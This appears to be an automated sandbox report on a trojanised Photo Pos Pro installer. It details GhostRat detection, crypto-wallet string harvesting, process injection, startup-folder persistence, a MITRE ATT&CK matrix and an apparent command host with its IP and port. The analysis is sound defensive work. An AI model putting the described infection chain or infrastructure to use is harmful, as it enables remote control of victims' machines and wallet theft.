                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IVIEWOBJECTDRAW_DMLT9_WITH_GDI
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IVIEWOBJECTDRAW_DMLT9_WITH_GDI
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_LEGACY_COMPRESSION
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\feature_localmachine_lockdown
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_OBJECT
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SPELLCHECKING
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SPELLCHECKING
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_STATUS_BAR_THROTTLING
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TABBED_BROWSING
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_NAVIGATE_URL
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_VALIDATE_NAVIGATE_URL
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\feature_weboc_popupmanagement
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_MOVESIZECHILD
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDON_MANAGEMENT
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBSOCKET
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBSOCKET
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WINDOW_RESTRICTIONS
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XMLHTTP

                  Stealing of Sensitive Information

                  barindex
                  Yara detected GhostRat
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: ebghls.exe, 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum
                  Source: ebghls.exe, 00000021.00000002.2602950947.0000000003411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus_Chrome
                  Source: MSBuild.exe, 00000025.00000002.2982455411.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q&C:\Users\user\AppData\Roaming\Binance
                  Source: powershell.exe, 00000010.00000002.2589783721.00007FFD9B5D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                  Source: MSBuild.exe, 00000025.00000002.2982455411.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q*C:\Users\user\AppData\Roaming\Ledger Live

                  Remote Access Functionality

                  barindex
                  Yara detected GhostRat
                  Source: Yara matchFile source: Process Memory Space: smcdll.exe PID: 5328, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information213
                  Scripting                  		1
                  Replication Through Removable Media                  		141
                  Windows Management Instrumentation                  		213
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		1
                  Input Capture                  		12
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts3
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		12
                  Obfuscated Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts12
                  Command and Scripting Interpreter                  		11
                  Scheduled Task/Job                  		1
                  Windows Service                  		1
                  Software Packing                  		NTDS4
                  File and Directory Discovery                  		Distributed Component Object Model1
                  Input Capture                  		4
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts11
                  Scheduled Task/Job                  		12
                  Registry Run Keys / Startup Folder                  		413
                  Process Injection                  		1
                  Timestomp                  		LSA Secrets168
                  System Information Discovery                  		SSHKeylogging15
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media3
                  PowerShell                  		RC Scripts11
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		Cached Domain Credentials391
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items12
                  Registry Run Keys / Startup Folder                  		1
                  File Deletion                  		DCSync161
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job133
                  Masquerading                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadow11
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron161
                  Virtualization/Sandbox Evasion                  		Network Sniffing2
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task413
                  Process Injection                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1622285 Sample: PhotoPosPro4_SetUp.exe Startdate: 23/02/2025 Architecture: WINDOWS Score: 100 143 vpnl.net 2->143 145 shed.dual-low.s-part-0032.t-0009.t-msedge.net 2->145 147 5 other IPs or domains 2->147 177 Suricata IDS alerts for network traffic 2->177 179 Found malware configuration 2->179 181 Malicious sample detected (through community Yara rule) 2->181 183 15 other signatures 2->183 12 msiexec.exe 89 44 2->12         started        16 ebghls.exe 2->16         started        18 LS.exe 2->18         started        20 3 other processes 2->20 signatures3 process4 dnsIp5 115 C:\Windows\Installer\MSID82B.tmp, PE32+ 12->115 dropped 117 C:\Windows\Installer\MSID78E.tmp, PE32 12->117 dropped 119 C:\Windows\Installer\MSID50C.tmp, PE32 12->119 dropped 129 9 other malicious files 12->129 dropped 207 Drops executables to the windows directory (C:\Windows) and starts them 12->207 23 MSID82B.tmp 1 12->23         started        25 PhotoPosPro4_SetUp.exe 16 12->25         started        28 msiexec.exe 12->28         started        41 2 other processes 12->41 121 C:\Users\user\AppData\Local\smcdll.exe, PE32 16->121 dropped 123 C:\Users\user\AppData\Roaming\...\smcdll.vbs, ASCII 16->123 dropped 209 Multi AV Scanner detection for dropped file 16->209 211 Found many strings related to Crypto-Wallets (likely being stolen) 16->211 213 Drops VBS files to the startup folder 16->213 215 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->215 30 MSBuild.exe 16->30         started        217 Writes to foreign memory regions 18->217 219 Allocates memory in foreign processes 18->219 221 Injects a PE file into a foreign processes 18->221 33 RegAsm.exe 18->33         started        35 RegAsm.exe 18->35         started        149 s0.2mdn.net 20->149 151 127.0.0.1 unknown unknown 20->151 125 C:\Users\user\...\PhotoPosPro4_SetUp.exe, PE32 20->125 dropped 127 C:\Users\user\AppData\Local\...\shiA856.tmp, PE32+ 20->127 dropped 131 4 other files (1 malicious) 20->131 dropped 37 smcdll.exe 20->37         started        39 msiexec.exe 4 20->39         started        file6 223 System process connects to network (likely due to code injection or exploit) 149->223 signatures7 process8 file9 43 cmd.exe 1 23->43         started        105 C:\Users\user\AppData\...\vcredist_x86.exe, PE32 25->105 dropped 107 C:\Users\user\AppData\...\vcredist_x64.exe, PE32 25->107 dropped 109 C:\Users\...\PhotoPosPro4_SetUp.exe_tmp.exe, PE32 25->109 dropped 111 2 other malicious files 25->111 dropped 46 PhotoPosPro4_SetUp.exe_tmp.exe 25->46         started        225 Found many strings related to Crypto-Wallets (likely being stolen) 30->225 227 Multi AV Scanner detection for dropped file 37->227 229 Writes to foreign memory regions 37->229 231 Injects a PE file into a foreign processes 37->231 49 MSBuild.exe 37->49         started        signatures10 process11 file12 205 Wscript starts Powershell (via cmd or directly) 43->205 51 wscript.exe 43->51         started        54 powershell.exe 7 43->54         started        56 powershell.exe 11 43->56         started        58 conhost.exe 43->58         started        135 C:\Windows\Photo Pos Pro 4 Uninstaller.exe, PE32 46->135 dropped 137 C:\Users\user\AppData\...\aiw5434265.EXE, PE32 46->137 dropped 139 C:\Program Files\...\ielib64.dll, PE32+ 46->139 dropped 141 21 other files (none is malicious) 46->141 dropped 60 vcredist_x64.exe 46->60         started        63 chrome.exe 46->63         started        66 PhotoPosPro_PreInstaller.exe 46->66         started        68 Photo Pos Pro 4.exe 46->68         started        signatures13 process14 dnsIp15 185 Wscript starts Powershell (via cmd or directly) 51->185 187 Windows Scripting host queries suspicious COM object (likely to drop second stage) 51->187 189 Suspicious execution chain found 51->189 70 powershell.exe 51->70         started        191 Bypasses PowerShell execution policy 54->191 193 Drops PE files to the startup folder 54->193 195 Found suspicious powershell code related to unpacking or dynamic code loading 54->195 197 Powershell drops PE file 54->197 74 tar.exe 3 54->74         started        133 C:\Windows\Temp\...\vcredist_x64.exe, PE32 60->133 dropped 199 Drops executables to the windows directory (C:\Windows) and starts them 60->199 76 vcredist_x64.exe 60->76         started        165 192.168.2.4, 1414, 443, 49672 unknown unknown 63->165 167 239.255.255.250 unknown Reserved 63->167 78 chrome.exe 63->78         started        file16 signatures17 process18 dnsIp19 97 C:\Users\user\AppData\Roaming\...\LS.exe, PE32 70->97 dropped 201 Found many strings related to Crypto-Wallets (likely being stolen) 70->201 81 LS.exe 70->81         started        84 powershell.exe 70->84         started        86 conhost.exe 70->86         started        99 C:\Users\Public\18.vbs, ASCII 74->99 dropped 101 C:\Users\Public\18.ps1, Unicode 74->101 dropped 103 C:\Windows\Temp\...\wixstdba.dll, PE32 76->103 dropped 159 www.photopos.com 78->159 161 lg3.media.net 23.58.104.30, 443, 50039 RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKC United States 78->161 163 34 other IPs or domains 78->163 file20 signatures21 process22 signatures23 169 Writes to foreign memory regions 81->169 171 Allocates memory in foreign processes 81->171 173 Injects a PE file into a foreign processes 81->173 88 RegAsm.exe 81->88         started        175 Loading BitLocker PowerShell Module 84->175 93 conhost.exe 84->93         started        95 WmiPrvSE.exe 84->95         started        process24 dnsIp25 153 jojo.ath.cx 157.20.182.16, 1414, 49742, 49771 FCNUniversityPublicCorporationOsakaJP unknown 88->153 155 filekg-download-01.fra1.cdn.digitaloceanspaces.com 172.64.145.29, 443, 49745 CLOUDFLARENETUS United States 88->155 157 4 other IPs or domains 88->157 113 C:\Users\user\AppData\Local\Temp\ebghls.exe, PE32 88->113 dropped 203 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 88->203 file26 signatures27

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.